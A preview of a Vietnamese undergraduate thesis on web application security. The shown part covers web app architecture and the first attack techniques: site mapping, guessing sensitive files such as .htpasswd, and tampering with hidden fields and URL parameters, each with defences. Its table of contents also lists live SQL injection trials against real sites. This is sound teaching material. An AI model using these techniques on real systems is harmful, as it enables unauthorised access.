Tài liệu Luận văn Một số vấn đề bảo mật ứng dụng web: Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 1 - Đại học Công Nghệ - ĐHQGHN
TRƯỜNG……………………
KHOA……………………………….
LUẬN VĂN TỐT NGHIỆP
Đề tài:
MỘT SỐ VẤN ĐỀ BẢO MẬT WEB
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 2 - Đại học Công Nghệ - ĐHQGHN
LỜI CẢM ƠN
Sau gần 4 tháng nỗ lực thực hiện, luận văn nghiên cứu “Các kĩ thuật tấn công và
bảo mật ứng dụng Web trên Internet” đã hoàn thành. Ngoài sự cố gắng hết mình của
bản thân, em đã nhận được sự khích lệ rất nhiều từ phía nhà trường, thầy cô, gia đình
và bạn bè.
Em xin gửi lời cảm ơn tới các thầy cô trong khoa Công nghệ Thông tin trường
Đại học Công Nghệ, Đại học Quốc Gia Hà Nội, đặc biệt là các thầy cô ở Bộ môn Các
Hệ Thống Thông Tin đã giúp đỡ em trưởng thành trong những năm học tập và rèn
luyện ở môi trường đại học.
Em xin chân thành cảm ơn thầy Lê Hồng Hải đã tạo điều kiện cho em tìm hiểu,
nghiên cứu và học ...
45 trang |
Chia sẻ: haohao | Lượt xem: 1243 | Lượt tải: 2
Bạn đang xem trước 20 trang mẫu tài liệu Luận văn Một số vấn đề bảo mật ứng dụng web, để tải tài liệu gốc về máy bạn click vào nút DOWNLOAD ở trên
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 1 - Đại học Công Nghệ - ĐHQGHN
TRƯỜNG……………………
KHOA……………………………….
LUẬN VĂN TỐT NGHIỆP
Đề tài:
MỘT SỐ VẤN ĐỀ BẢO MẬT WEB
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 2 - Đại học Công Nghệ - ĐHQGHN
LỜI CẢM ƠN
Sau gần 4 tháng nỗ lực thực hiện, luận văn nghiên cứu “Các kĩ thuật tấn công và
bảo mật ứng dụng Web trên Internet” đã hoàn thành. Ngoài sự cố gắng hết mình của
bản thân, em đã nhận được sự khích lệ rất nhiều từ phía nhà trường, thầy cô, gia đình
và bạn bè.
Em xin gửi lời cảm ơn tới các thầy cô trong khoa Công nghệ Thông tin trường
Đại học Công Nghệ, Đại học Quốc Gia Hà Nội, đặc biệt là các thầy cô ở Bộ môn Các
Hệ Thống Thông Tin đã giúp đỡ em trưởng thành trong những năm học tập và rèn
luyện ở môi trường đại học.
Em xin chân thành cảm ơn thầy Lê Hồng Hải đã tạo điều kiện cho em tìm hiểu,
nghiên cứu và học hỏi những kinh nghiệm trong quá trình làm khoá luận.
Xin cám ơn tất cả bạn bè đã và đang động viên, giúp đỡ tôi trong quá trình học
tập và hoàn thành tốt khóa luận tốt nghiệp này.
Hà Nội, tháng 5 năm 2009
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 3 - Đại học Công Nghệ - ĐHQGHN
TÓM TẮT NỘI DUNG
Trong khóa luận này, tác giả sẽ trình bày về ứng dụng web, các vấn đề về bảo
mật trong ứng dụng web, khóa luận tập trung vào một số kỹ thuật tấn công vào ứng
dụng web, tác hại và cách phòng chống.
Phần mở đầu của khoá luận là tổng quan ứng dụng web, cách hoạt động của ứng
dụng web và giới thiệu về bảo mật ứng dụng web. Đây là cơ sở để tìm hiểu các vấn đề
bảo mật trên ứng dụng web.
Phần thứ hai của khoá luận dành để trình bày các dạng lỗ hổng của ứng dụng
web và các kỹ thuật tấn công dựa trên những lỗ hổng đó.
Phần thứ ba của khoá luận dành để trình bày về vài tấn công ứng dụng web dựa
trên lý thuyết đã trình bày ở các phần trước.
Phần thứ tư có nhiệm vụ trình bầy các kết quả đạt được của luận văn, những hạn
chế và phát triển trong tương lai.
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 4 - Đại học Công Nghệ - ĐHQGHN
MỤC LỤC
LỜI CẢM ƠN ..............................................................................................................1
TÓM TẮT NỘI DUNG..................................................................................................3
BẢNG CÁC THUẬT NGỮ VIẾT TẮT..........................................................................5
BẢNG CÁC THUẬT NGỮ...........................................................................................6
DANH MỤC CÁC HÌNH VẼ BẢNG BIỂU....................................................................7
MỞ ĐẦU .....................................................................................................................8
CHƯƠNG 1. GIỚI THIỆU VỀ BẢO MẬT ỨNG DỤNG WEB ..............................10
1.1. Giới thiệu về ứng dụng web................................................................................................................. 10
1.1.1. Khái niệm ứng dụng web ....................................................................................................................... 10
1.1.2. Mô tả hoạt động của một ứng dụng web ................................................................................................ 10
1.2. Bảo mật ứng dụng web ........................................................................................................................ 12
1.2.1. Giới thiệu về bảo mật ứng dụng web ..................................................................................................... 12
1.2.2. Các vấn đề chính của bảo mật ứng dụng web ........................................................................................ 13
CHƯƠNG 2. MỘT SỐ TẤN CÔNG ỨNG DỤNG WEB VÀ CÁCH PHÒNG
CHỐNG 14
2.1. Các kỹ thuật tấn công cơ bản.............................................................................................................. 14
2.1.1. Lập bản đồ trang .................................................................................................................................... 14
2.1.2. Đoán tập tin và thư mục ......................................................................................................................... 15
2.1.3. Khai thác khi biết những luồng bảo mật ................................................................................................ 15
2.1.4. Vượt qua hạn chế trên các lựa chọn đầu vào.......................................................................................... 15
2.2. Tấn công dựa vào trạng thái trang..................................................................................................... 16
2.2.1. Giới thiệu ............................................................................................................................................... 16
2.2.2. Tấn công vào trường ẩn ......................................................................................................................... 16
2.2.2.1. Kỹ thuật tấn công vào trường ẩn ............................................................................................................ 16
2.2.2.2. Cách phòng chống.................................................................................................................................. 17
2.2.3. Tấn công dựa vào tham số CGI.............................................................................................................. 17
2.2.3.1. Kỹ thuật tấn công vào tham số CGI ....................................................................................................... 18
2.2.3.2. Cách phòng chống.................................................................................................................................. 18
2.2.4. Nhiêm độc cookie .................................................................................................................................. 18
2.2.4.1. Kỹ thuật tấn công nhiễm độc cookie...................................................................................................... 18
2.2.4.2. Cách phòng chống.................................................................................................................................. 19
2.2.5. Tấn công bằng nhảy URL ...................................................................................................................... 19
2.2.5.1. Kỹ thuật tấn công nhảy URL ................................................................................................................. 19
2.2.5.2. Cách phòng chống.................................................................................................................................. 19
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 5 - Đại học Công Nghệ - ĐHQGHN
2.2.6. Chiếm hữu phiên làm việc (Session hijacking)...................................................................................... 19
2.2.6.1. Kỹ thuật tấn công chiếm hữu phiên làm việc......................................................................................... 20
2.2.6.2. Các cách phòng chống tấn công chiếm hữu phiên làm việc................................................................... 22
2.3. Tấn công chèn mã lệnh thực thi trên trình duyệt nạn nhân (cross-site scripting) – XSS .............. 22
2.3.1. Giới thiệu về cross-site scripting............................................................................................................ 22
2.3.2. Kỹ thuật tấn công XSS........................................................................................................................... 23
2.3.3. Mã kịch bản tấn công XSS..................................................................................................................... 24
2.3.3.1. Ăn cắp mã phiên làm việc của người dùng để thực hiện chiếm hữu phiên làm việc, ............................ 24
ví dụ mã sau:.......................................................................................................................................................... 24
2.3.3.2. Tạo thủ thuật để khiến người dùng làm việc không biết đến ................................................................. 24
2.3.3.3. Các cách chèn mã có thể ........................................................................................................................ 24
2.3.4. Các cách phòng chống ........................................................................................................................... 26
2.3.5. Một số trang vẫn còn lỗ hổng của Việt Nam: ........................................................................................ 27
2.4. Tấn công bằng kỹ thuật chèn mã SQL (SQL Injection) ................................................................... 27
2.4.1. Giới thiệu về SQL Injection................................................................................................................... 27
2.4.2. Các dạng tấn công SQL Injection .......................................................................................................... 29
2.4.2.1. Dạng tấn công vượt qua trang đăng nhập............................................................................................... 29
2.4.2.2. Tấn công dựa vào câu lệnh SELECT..................................................................................................... 30
2.4.2.3. Tấn công dựa vào câu lệnh kết hợp UNION.......................................................................................... 30
2.4.2.4. Tấn công dựa vào câu lệnh INSERT...................................................................................................... 33
2.4.2.5. Tấn công dựa vào STORED PROCEDURE.......................................................................................... 33
2.4.3. Cách phòng chống.................................................................................................................................. 33
CHƯƠNG 3. TẤN CÔNG THỰC NGHIỆM..........................................................35
3.1. URL Jumping....................................................................................................................................... 35
3.2. Lỗi XSS ................................................................................................................................................. 36
3.3. SQL Injection ....................................................................................................................................... 37
3.3.1. Trang thứ nhất........................................................................................................................................ 37
3.3.2. Trang thứ hai.......................................................................................................................................... 39
3.3.3. Trang thứ ba........................................................................................................................................... 40
CHƯƠNG 4. KẾT LUẬN..........................................................................................42
4.1. Kết quả đạt được.................................................................................................................................. 42
4.2. Định hướng phát triển ......................................................................................................................... 42
LỜI KẾT....................................................................................................................43
TÀI LIỆU THAM KHẢO.............................................................................................44
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 5 - Đại học Công Nghệ - ĐHQGHN
BẢNG CÁC THUẬT NGỮ VIẾT TẮT
HTML HyperText Markup Language−Ngôn ngữ đánh dấu siêu văn bản
HTTP HyperText Transfer Protocol−giao thức truyền siêu văn bản
URL Uniform Resource Locator−địa chỉ tham chiếu tài nguyên trên Internet
CGI Common Gateway Interface−Chuẩn kết nối ứng dụng và máy chủ Web
SSL Secure socket layer−Giao thức truyền thông tin an toàn qua mạng
XSS Cross-site scripting−Tấn công chèn mã thực thi lên trình duyệt nạn nhân
ID Identification−Định danh
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 6 - Đại học Công Nghệ - ĐHQGHN
BẢNG CÁC THUẬT NGỮ
URL Jumping Kỹ thuật tấn công nhảy URL
SQL Injection Tấn công bằng chèn mã SQL
Server Máy chủ
Web application
sever
Máy chủ ứng dụng web
Database Server Máy chủ cơ sở dữ liệu
Popup Cửa sổ của trình duyệt web được mở ra ngoài, khác với cửa sổ
đang làm việc.
Session Phiên làm việc của client với server
Session ID Mã phiên làm việc của client và server
Attacker Kẻ tấn công ứng dụng web
Hacker Kẻ tấn công ứng dụng web
Cookie Dữ liệu lưu trạng thái trang web của người dùng
Admin Người quản trị của ứng dụng web
Username Tên đăng nhập ứng dụng web
Password Mật khẩu đăng nhập ứng dụng web
Client Trình khách trong ứng dụng khách−chủ
Firewall Tường lửa bảo vệ hệ thống mạng
Request Yêu cầu của client
Form Mẫu biểu trong HTML
File text Tệp văn bản
Session
hijacking
Tấn công chiếm hữu phiên làm việc
Session fixation Tấn công ấn định phiên làm việc
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 7 - Đại học Công Nghệ - ĐHQGHN
DANH MỤC CÁC HÌNH VẼ BẢNG BIỂU
Hình 1-1 mô tả hoạt động của ứng dụng web
( ............................10
Hình 2-1 Sơ đồ trang của trang web qbssoftware
(
Hình 2-2 Dạng cookie của Internet Explorer. ...............................................................18
Hình 2-3 Thứ tự các trang trong ứng dụng thanh toán trực tuyến.................................19
Hình 2-4 SessionID được lưu trong tham số CGI .........................................................20
Hình 2-5 Ăn cắp SessionID bằng cách giám sát đường truyền (nguồn:
) ......................................20
Hình 2-6 Tấn công ấn định phiên làm việc. ..................................................................21
Hình 2-7 các bước tấn công ấn định phiên làm việc. ....................................................22
Hình 2-8 Hacker thực hiện một cuộc tấn công thành công vào ứng dụng web (nguồn:
Hình 3-1 trang đăng nhập của admin của trang
Hình 3-2 Trang quản lý của admin của trang
Hình 3-3 Chèn mã kịch bản vào trang web ...................................................................36
Hình 3-4 Trang bị dính lỗi XSS. ...................................................................................37
Hình 3-5 trang đăng nhập của admin của trang
..................................................38
Hình 3-6 Hình ảnh sau khi đã đăng nhập
..................................................38
Hình 3-7 Trang đăng nhập của admin của trang
Hình 3-8 Hình ảnh sau khi đăng nhập của trang :
Hình 3-9 Trang đăng nhập của admin trang
..............................................................41
Hình 3-10: Hình ảnh sau khi đăng nhập của trang
..............................................................41
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 8 - Đại học Công Nghệ - ĐHQGHN
MỞ ĐẦU
Ngày nay, Internet và các ứng dụng trên Internet được phát triển rộng rãi. Các cá
nhân, tổ chức, doanh nghiệp … đều có nhu cầu sử dụng Internet với mục đích riêng.
Các dịch vụ trực tuyến ngày càng được phát triển như mua hàng trực tuyến, giao dịch
ngân hàng trực tuyến, học trực tuyến…Theo đó các dịch vụ trực tuyến càng được phát
triển, mở rộng thì càng có nhiều lỗ hổng bảo mật và trở thành đối tượng bị tấn công
với các mục đích khác nhau.
Cùng với sự phát triển của Internet và các dịch vụ trên Internet, số lượng các vụ
tấn công trên Internet cũng tăng với tốc độ chóng mặt. Theo tập đoàn Symantec số
lượng các vụ tấn công bằng mã độc trên Internet năm 2003 là 18.827 vụ, năm 2004 là
69.107 vụ, năm 2007 là 624.267 vụ và đến năm 2008 là 1.656.227 vụ. Riêng trong
năm 2008 ghi nhận 5.147 chủng loại mã độc chuyên chiếm quyền kiểm soát máy chủ
mới xuất hiện. (Nguồn:
whitepaper_internet_security_threat_report_xiv_04-2009.en-us.pdf)
Không chỉ số lượng các cuộc tấn công tăng lên nhanh chóng mà các phương pháp
tấn công cũng ngày càng tinh vi và có tổ chức. Những cuộc tấn công thời kỳ đầu chủ
yếu là đoán tên người sử dụng/mật khẩu (Username/password) hoặc sử dụng một số
lỗi của các chương trình và hệ điều hành (security hole) làm vô hiệu hóa hệ thống bảo
vệ, tuy nhiên các cuộc tấn công gần đây còn bao gồm cả các thao tác như giả mạo địa
chỉ IP, theo dõi thông tin truyền qua mạng, chiếm các phiên làm việc từ xa (telnet hoặc
rlogin), cài đặt trojan hay worm để chiếm quyền kiểm soát máy tính, ăn cắp, lợi dụng
các thông tin của người dùng về ngân hàng, giao dịch chứng khoán để ăn cắp tiền của
họ…Vì thế nhu cầu bảo vệ thông tin trên Internet là cần thiết nhằm bảo vệ dữ liệu, bảo
vệ thông tin người dùng và bảo vệ hệ thống
Đã có những công cụ tự động tìm lỗ hổng để giúp đỡ những nhà phát triển ứng
dụng web. Tuy nhiên do nhiều nguyên nhân vẫn có những lỗ hổng tồn tại làm cơ sở để
tấn công, có thể là do các nhà phát triển ứng dụng không tuân thủ các yêu cầu về bảo
mật trong quá trình xây dựng ứng dụng, có thể do cuộc tấn công là hoàn toàn mới và
tinh vi đối với những nhà phát triển và nhà quản trị hệ thống.
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 9 - Đại học Công Nghệ - ĐHQGHN
Luận văn được thực hiện với mục đích tìm hiểu, phân tích các lỗ hổng bảo mật từ
đơn giản đến phức tạp trong các ứng dụng web và các phương án phòng chống các
cuộc tấn công.
Nội dung khóa luận sẽ bao gồm các phần sau (bốn chương):
• Chương 1: Tìm hiểu chung về ứng dụng web, khái niệm và hoạt động của
ứng dụng web trên Internet. Đồng thời cũng đề cập khái quát về bảo mật
ứng dụng web.
• Chương 2: Trình bầy về các kỹ thuật tấn công vào ứng dụng web và cách
phòng chống
o Các kỹ thuật tấn công cơ bản
o Các kỹ thuật tấn công dựa vào trạng thái của trang web
o Kỹ thuật tấn công chèn mã lệnh thực thi trên trình duyệt nạn nhân
(XSS).
o Kỹ thuật tấn công chèn câu truy vấn SQL (SQL injection) và cách
phòng chống.
• Chương 3: Một vài ví dụ tấn công ứng dụng web bằng các kỹ thuật ở trình
bầy các chương trước.
• Chương 4: Trình bầy kết quả đạt được của luận văn và hướng phát triển
trong tương lai.
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 10 - Đại học Công Nghệ - ĐHQGHN
Chương 1. GIỚI THIỆU VỀ BẢO MẬT ỨNG DỤNG
WEB
1.1. Giới thiệu về ứng dụng web
1.1.1. Khái niệm ứng dụng web
Ứng dụng web là một ứng dụng khách/chủ truy cập qua mạng Internet hay
intranet sử dụng giao thức HTTP/s để tương tác với người dùng hay hệ thống khác.
Trình khách dành cho người sử dụng là một phần mềm phổ biến và chung cho
các ứng dụng web chính là trình duyệt web như Internet Explorer, Nescape Navigator.
Ứng dụng web rất phổ biến bởi sự cập nhật và duy trì mà không cần phần mềm phân
phối, cài đặt tại hàng nghìn máy tính của người sử dụng. Các ứng dụng web phổ biến
hiện nay là: webmail, bán hàng trực tuyến, giao dich, đấu giá trực tuyến, wiki, diễn
đàn thảo luận và nhiều chức năng khác.
Trước đây ứng dụng web được xây dựng trên mô hình tập trung, một trình chủ
chạy trên một máy chủ và kết nối vào cơ sở dữ liệu ngay trên máy chủ. Hiện nay các
ứng dụng web được xây dựng theo mô hình phân tán, nhiều máy chủ đáp ứng yêu cầu
và kết nối tới nhiều nguồn cơ sở dữ liệu tại. Trình chủ được viết bằng các ngôn ngữ
như: PHP, ASP, ASP.NET, JSP…
1.1.2. Mô tả hoạt động của một ứng dụng web
Hoạt động của ứng dụng web được biểu diễn như hình sau:
Hình 1-1 mô tả hoạt động của ứng dụng web
(
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 11 - Đại học Công Nghệ - ĐHQGHN
Một ứng dụng web bao gồm hai phía: Client và Server
• Phía Client: là trình duyệt web
• Phía Server: bao gồm hai lớp trong kiến trúc ứng dụng web, lớp logic (Web
Server, Web Application Server) và lớp dữ liệu (Database Server).
Bên cạnh đó tường lửa được sử dụng để chống lại sự truy cập trái phép, bảo vệ
các nguồn thông tin mội bộ cũng như hạn chế sự xâm nhập vào hệ thống của một số
thông tin khác không mong muốn.
Chức năng chính của Firewall là:
• Cho phép hoặc cấm những dịch vụ truy xuất ra ngoài
• Cho phép hoặc cấm những dịch vụ từ bên ngoài truy nhập vào trong
• Kiểm soát địa chỉ truy nhập, cấm địa chỉ truy nhập.
Đầu tiên trình duyệt sẽ gửi một yêu cầu (request) đến Web Server thông qua các
lệnh cơ bản GET, POST… của giao thức HTTP/s, Web Server lúc này có thể cho thực
thi một chương trình được xây dựng từ nhiều ngôn ngữ như Perl, C/C++… hoặc Web
Server yêu cầu bộ diễn dịch thực thi các trang ASP, JSP… theo yêu cầu của trình
duyệt.
Tùy theo các tác vụ của chương trình được cài đặt mà nó xử lý, tính toán, kết nối
đến cơ sở dữ liệu, lưu các thông tin do trình duyệt gửi đến…và từ đó trả về cho trình
duyệt một luồng dữ liệu có định dạng theo giao thức HTTP, nó gồm 2 phần:
• Header mô tả các thông tin về gói dữ liệu và các thuộc tính, trạng thái trao đổi
giữa trình duyệt và WebServer.
• Body là phần nội dung dữ liệu mà Server gửi về Client, nó có thể là một file
HTML, một hình ảnh, một đoạn phim hay một văn bản bất kì.
Theo mô hình ở hình 1−1, với firewall, luồng thông tin giữa trình duyệt và Web
Server là luồng thông tin hợp lệ. Vì thế, nếu hacker tìm thấy vài lỗ hổng trong ứng
dụng Web thì firewall không còn hữu dụng trong việc ngăn chặn hacker này. Do đó,
các kĩ thuật tấn công vào một hệ thống mạng ngày nay đang dần tập trung vào những
sơ suất (hay lỗ hổng) trong quá trình tạo ứng dụng của những nhà phát triển Web hơn
là tấn công trực tiếp vào hệ thống mạng, hệ điều hành. Tuy nhiên, hacker cũng có thể
lợi dụng các lỗ hổng Web để mở rộng sự tấn công của mình vào các hệ thống không
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 12 - Đại học Công Nghệ - ĐHQGHN
liên quan khác.
1.2. Bảo mật ứng dụng web
1.2.1. Giới thiệu về bảo mật ứng dụng web
Bảo mật ứng dụng web cũng tương tự như bảo mật các ứng dụng chung khác.
Sự khác nhau lớn giữa ứng dụng client-server cũ và ứng dụng web
• Hệ thống client-server trước đây chỉ hoạt động trên mạng riêng, tin cậy.
• Ứng dụng web bây giờ được thiết kể để hoạt động trên Internet – một môi trường
không tin cậy.
• Một vài đặc điểm khác khiến ứng dụng web trở nên đặc biệt:
o Nhiều tổ chức vẫn không thực hiện những dự án tạo ứng dụng web như các
dự án phát triển
o Máy chủ ứng dụng web chủ yếu chạy trên một mạng Lan mở rộng hay một
khu không có sự kiểm soát đằng sau tường lửa của tổ chức làm cho chúng
trở thành mục tiêu quan trọng.
o Rất dễ dàng cho các attacker ẩn giữa khối lượng truy cập lớn được tạo ra bởi
trang web.
o Dự án ứng dụng web có vòng đời phát triển ngắn và luôn có lý do làm cho
chúng phát triển nhanh hơn.
o Tính chất không lưu trạng thái của HTTP có nghĩa là tình trạng phiên làm
việc của người dùng phải được giữ lại ở đâu đó, có thể nơi đó sẽ bị sự điều
khiển của kẻ tấn công.
o Thông tin truyền trên mạng Internet không được mã hóa.
Ứng dụng web là một trong các trường hợp của ứng dụng client-server trong đó vấn đề
bảo mật làm giảm sự cân bằng của những mục tiêu khác.
• Tính tin cậy của ứng dụng web đối lập với bảo mật vì rất khó để kiểm thử hoàn
toàn lỗi khi xử lý mã.
• Hiệu suất cũng đi ngược với mục đích bảo mật vì các phương pháp truyền thống
để tăng hiệu suất trong ứng dụng client-server (chủ yếu là đẩy các chức năng về
phía client) sẽ tạo ra những lỗ hổng mới.
• Tiện ích là đối lập với bảo mật vì càng cung cấp nhiều thông tin cho người dùng
cũng là cung cấp manh mối cho những kẻ tấn công về cách làm việc, quản lý truy
cập. Các yêu cầu về xác thực thường làm cho hệ thống kém tiện dụng hơn khi sử
dụng.
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 13 - Đại học Công Nghệ - ĐHQGHN
• Khả năng kiểm thử cũng đối lập với bảo mật vì sử dụng các công cụ để kiểm thử
sẽ mở ra các cách truy cập vào hệ thống.
1.2.2. Các vấn đề chính của bảo mật ứng dụng web
Một ứng dụng web thông thường bao gồm một trình chủ, một trình khách, và một
mạng lưới.
• Đối với các trình khách, các vấn đề an ninh chính là:
o Đối phương có thể giả mạo với bất kỳ dữ liệu nào được lưu trữ trên trang
Web của client. Điều này có nghĩa là tất cả các dữ liệu đến từ client phải
được kiểm tra sự hợp lệ khi nó được nhận từ server.
o Mã nguồn của phía client phải được ẩn với đối phương vì bất kỳ cái gì
bắt nguồn từ client có thể bị đọc và giả mạo cùng với nó.
o Các thông báo lỗi ở phía server phải bị ẩn với đối phương vì nó có thể
được dùng để tìm hiểu về cấu trúc và cấu hình của máy chủ.
• Đối với mạng, các vấn đề chính là:
o Mọi dữ liệu đến server bằng HTTP đều có thể bị xem và bị giả mạo bởi
bên thứ ba.
o SSL cung cấp khả năng mật mã, nhưng điều này chỉ ngăn cản xem hoặc
giả mạo với dữ liệu giữa các nguồn gốc của nơi chuyển dữ liệu và máy
chủ. SSL không thể ngăn cản sự giả mạo khi dữ liệu tại nguồn gốc của
nó.
Trong chương này, tác giả đã trình bầy về ứng dụng web và khái quát về bảo mật
ứng dụng web. Trong chương tiếp theo, tác giả sẽ trình bầy một số kỹ thuật tấn công
vào ứng dụng web và cách phòng chống.
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 14 - Đại học Công Nghệ - ĐHQGHN
Chương 2. MỘT SỐ TẤN CÔNG ỨNG DỤNG WEB VÀ
CÁCH PHÒNG CHỐNG
2.1. Các kỹ thuật tấn công cơ bản
2.1.1. Lập bản đồ trang
Những kẻ tấn công có thể làm một số việc sau:
• Sử dụng một chương trình thu thập đi theo các liên kết trong ứng dụng và chỉ ra
luồng di chuyển theo các trang của ứng dụng và cơ chế xác thực.
• Đọc ghi chú trong các tài liệu gửi đến trình duyệt để có được sự gợi ý về logic
trong kinh doanh hay các thuật toán.
• Tìm tên người dùng, mật khẩu, và tên cơ sở dữ liệu trong các các tài liệu gửi
cho khách hàng.
• Tìm các truy vấn SQL để có manh mối về cấu trúc cơ sở dữ liệu và cách truy
vấn được xây dựng từ dữ liệu động.
• Xác định vị trí trường ẩn trong form.
• Tìm ra giá trị của các tham số chuyển giữa các trang web.
• Tạo ra các trường hợp lỗi khác nhau để xem máy chủ trả lời. Một ví dụ là, nếu
kiểm tra máy chủ khác nhau đưa ra một thông báo lỗi cho một không đúng tên
người dùng so với sai mật khẩu.
Hình 2-1 Sơ đồ trang của trang web qbssoftware
(
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 15 - Đại học Công Nghệ - ĐHQGHN
Một số đề phòng lập bản đồ trang
• Tránh đưa ra các thông tin về các truy vấn SQL.
• Không gắn kèm các ghi chú trong mã gửi đến khách hàng.
• Không đặt tên người dùng, mật khẩu, cơ sở dữ liệu vào chuỗi kết nối, trong mã
và thông báo lỗi.
2.1.2. Đoán tập tin và thư mục
Một kỹ thuật đơn giản khác là đoán tập tin và thư mục. Những kẻ tấn công sẽ
đoán những tệp và thư mục chứa thông tin quan trọng và cố gắng truy cập vào đó để
lấy thông tin.
• Tệp tin như config.inc, web.xml, và server.xml có thể chứa thông tin kết nối
cơ sở dữ liệu.
• Tập tin. Htpasswd có thể chứa thông tin tên người dùng và mật khẩu của họ.
• Thư mục như template/ có thể chứa các tệp tin với thông tin về các ứng dụng.
Các cách giảm thiểu:
• Sử dụng danh sách kiểm soát truy cập để chặn những nguời dùng truy cập vào
các thư mục và tệp hệ thống không được phép.
• Bảo vệ bất kỳ tệp tin không liên quan đến người dùng, bằng cách đặt chúng
trong thư mục bên ngoài hệ thống file hoặc trong những nơi được bảo vệ đặc
biệt như WEB-INF/.
2.1.3. Khai thác khi biết những luồng bảo mật
Cách khai thác
• Tất cả các phần mềm bao gồm cả hệ điều hành, ứng dụng máy chủ, và các công
cụ hỗ trợ đều có lỗi.
• Khi lỗi đã được tìm thấy, cách bản sửa lỗi thường được cung cấp để sửa chữa
chúng.
• Thời gian mà các quản trị viên hệ thống áp dụng bản sửa lỗi bảo mật vào hệ
thống của mình thì những kẻ tấn có thể khai thác những lỗ hổng đã được phát
hiện trong thời gian giữa bản lỗi và bản được sủa của người quản trị
Để giảm thiểu rủi ro, xác định các thành phần của bên thứ ba trong hệ thống của
bạn, kiểm tra nó và ưu tiên cho việc sửa lỗi bảo mật
2.1.4. Vượt qua hạn chế trên các lựa chọn đầu vào
Một lớp tấn công khác là vượt qua hạn chế trên lựa chọn đầu vào
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 16 - Đại học Công Nghệ - ĐHQGHN
• Thông tin người dùng nhập vào thường bị hạn chế theo những phạm vi để dễ
kiểm soát.
• Để cải thiện kinh nghiệm người sử dụng, mã của phía client sẽ thực hiện việc
xác nhận dữ liệu của người dùng.
• Các ứng dụng được viết một cách đơn giản tin tưởng các giá trị được gửi lên sẽ
nằm trong phạm vi mong đợi.
• Bởi vượt qua được giao diện người dùng, những kẻ tấn công có thể gán các giá
trị tùy ý cho biến đầu vào của người dùng.
Để giảm thiểu rủi ro, xác nhận tính hợp lệ tất cả các dữ liệu đến từ client.
2.2. Tấn công dựa vào trạng thái trang
2.2.1. Giới thiệu
Giao thức HTTP không lưu trạng thái của các trang web hay người dùng khi
tương tác với ứng dụng. Do yêu cầu của ứng dụng web như đăng nhập vào hệ thống để
sử dụng những tiện ích hay đơn giản chỉ là đánh dấu những nơi đã đi qua nên các ứng
dụng web sẽ lưu lại trạng thái các phiên làm việc bằng cách thiết lập giá trị nào đó
được lưu lại ở máy tính của người dùng hay trong mã gửi đến người dùng thông qua
trình duyệt.
Trạng thái của phiên làm việc sẽ được lưu theo ba cách sau:
• Trường ẩn trong form
• Tham số CGI (cả trong phương thức GET và POST)
• Cookies
2.2.2. Tấn công vào trường ẩn
2.2.2.1. Kỹ thuật tấn công vào trường ẩn
Ta có một form gồm cả trường ẩn như sau:
Nếu không có thay đổi gì sẽ gửi đến máy chủ nội dung là:
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 17 - Đại học Công Nghệ - ĐHQGHN
Nếu hacker thay đổi giá trị của biến “giaca”
Thì yêu cầu sẽ thay đổi thành:
Và giá trị gửi lên server đã là giá trị bị thay đổi.
2.2.2.2. Cách phòng chống
• Đặt cho trường ẩn một cái tên khó hiểu.
• Sử dụng các giá trị được băm hay mã hóa.
• Nếu có thể thì không sử dụng trường ẩn.
• Kiểm tra giá trị của chúng khi đến server.
2.2.3. Tấn công dựa vào tham số CGI
Tham số CGI có thể nhìn thấy ở cuối của URL trong yêu cầu GET đằng sau dấu
“?”, mỗi tham số là một cặp gồm tên-giá trị phân cách nhau bằng dấu “=”, các tham
số được phân cách nhau bởi dấu “&”. Nếu trong phương thức POST, ta có thể tìm
thấy ở phần chính của yêu cầu.
Ví dụ:
%9Bi+Google&meta=&aq=f&oq=
Ở đây có các tham số
Tham số Giá trị
Hl vi
Q URL
btnG T%C3%ACm+v%E1%BB%9Bi+Google
meta
Aq f
Oq
Luận văn tốt nghiệp Một số vấn đề bảo mật ứng dụng web
Dương Thị Thu Hương – K50CHTTT - Trang 18 - Đại học Công Nghệ - ĐHQGHN
2.2.3.1. Kỹ thuật tấn công vào tham số CGI
Ta có thể tìm tham số bằng hiển thị mã hoặc nhìn trên URL
Chỉnh sửa URL một cách thủ công bằng cách thay đổi giá trị của tham số hoặc
thêm vào các tham số khác.
Ví dụ: nếu ứng dụng web cho phép người dùng thay đổi mật khẩu và trang thay
đổi có URL truyền đi như sau:
Trong URL trên có hai tham số :
Tham số user là tên tài khoản cần thay đổi mật khẩu, có giá trị mike
